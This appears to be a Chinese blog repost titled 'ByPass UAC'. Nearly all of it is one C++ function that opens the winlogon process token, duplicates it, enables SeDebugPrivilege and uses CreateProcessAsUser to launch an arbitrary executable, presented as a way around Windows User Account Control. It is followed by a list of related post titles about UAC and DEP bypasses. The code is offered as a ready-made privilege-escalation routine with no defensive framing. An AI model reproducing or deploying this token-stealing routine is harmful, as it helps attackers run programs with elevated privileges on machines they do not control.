ByPass UAC
来源:互联网 发布:阿里云实际应用 编辑:程序博客网 时间:2024/05/18 02:33
BOOL PassUAC()
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
BOOL bResult = FALSE;
DWORD dwSessionId,winlogonPid;
HANDLE hUserToken,hUserTokenDup,hPToken,hProcess;
DWORD dwCreationFlags;
//
// Log the client on to the local computer.
//
dwSessionId = WTSGetActiveConsoleSessionId();
//
// Find the winlogon process
//
PROCESSENTRY32 procEntry;
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnap == INVALID_HANDLE_VALUE)
{
return 1 ;
}
procEntry.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnap, &procEntry)){
return 1 ;
}
do
{
if (_stricmp(procEntry.szExeFile, "winlogon.exe") == 0)
{
//
// We found a winlogon process...make sure it's running in the console session
//
DWORD winlogonSessId = 0;
if (ProcessIdToSessionId(procEntry.th32ProcessID, &winlogonSessId) && winlogonSessId == dwSessionId){
winlogonPid = procEntry.th32ProcessID;
break;
}
}
} while (Process32Next(hSnap, &procEntry));
WTSQueryUserToken(dwSessionId,&hUserToken);
dwCreationFlags = NORMAL_PRIORITY_CLASS|CREATE_NEW_CONSOLE;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb= sizeof(STARTUPINFO);
si.lpDesktop = "winsta0\\default";
ZeroMemory(&pi, sizeof(pi));
TOKEN_PRIVILEGES tp;
LUID luid;
hProcess = OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);
if(!::OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
|TOKEN_DUPLICATE|TOKEN_ASSIGN_PRIMARY|TOKEN_ADJUST_SESSIONID
|TOKEN_READ|TOKEN_WRITE,&hPToken))
{
int abcd = GetLastError();
printf("Process token open Error: %u\n",GetLastError());
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){
printf("Lookup Privilege value Error: %u\n",GetLastError());
}
tp.PrivilegeCount =1;
tp.Privileges[0].Luid =luid;
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification,TokenPrimary,&hUserTokenDup);
int dup = GetLastError();
//
//Adjust Token privilege
//
SetTokenInformation(hUserTokenDup,TokenSessionId,(void*)dwSessionId,sizeof(DWORD));
if (!AdjustTokenPrivileges(hUserTokenDup,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,NULL)){
int abc =GetLastError();
printf("Adjust Privilege value Error: %u\n",GetLastError());
}
if (GetLastError()== ERROR_NOT_ALL_ASSIGNED)
{
printf("Token does not have the provilege\n");
}
LPVOID pEnv =NULL;
if(CreateEnvironmentBlock(&pEnv,hUserTokenDup,TRUE))
{
dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
}
else
pEnv=NULL;
//
// Launch the process in the client's logon session.
//
bResult = CreateProcessAsUser(
hUserTokenDup, // client's access token
_T("C:\\SessionLauncher\\a.exe"), // file to execute
NULL,// command line
NULL,// pointer to process SECURITY_ATTRIBUTES
NULL,// pointer to thread SECURITY_ATTRIBUTES
FALSE,// handles are not inheritable
dwCreationFlags,// creation flags
pEnv,// pointer to new environment block
NULL,// name of current directory
&si,// pointer to STARTUPINFO structure
&pi// receives information about new process
);
int iResultOfCreateProcessAsUser = GetLastError();
CloseHandle(hProcess);
CloseHandle(hUserToken);
CloseHandle(hUserTokenDup);
CloseHandle(hPToken);
return 0;
}
- ByPass UAC
- win7 UAC bypass
- bypass UAC 提权
- 动手打造Bypass UAC自动化测试小工具,可绕过最新版Win10
- uac
- UAC
- UAC
- UAC
- UAC
- Bypass UAC的一个实例分析 zzz666862016-09-03共20982人围观 ,发现 3 个不明物体
- Bypass FsdFilter
- Bypass RestoreSystem
- bypass ujvc
- bypass更新
- bypass open_basedir
- DEP bypass
- PASS UAC
- windows7 UAC
- 中断服务程序的要求
- hibernate的like用法以及hibernate.query.factory_class的写法问题
- java script验证表单时常用
- 《coredump问题原理探究》Linux x86版5.6节C风格数据结构内存布局之复合类型构成的结构体
- 分数加减法
- ByPass UAC
- c语言标准输入输出重定向到不同文件
- 题目4:斐波那契数列
- 硬件驱动模块
- 数字字母组合生产的图片验证码方法
- java版词法分析程序
- uuid (c++ 实现)
- 如何在ASP.NET中实现数字和字符的混合验证码生产
- os.getcwd()函数的用法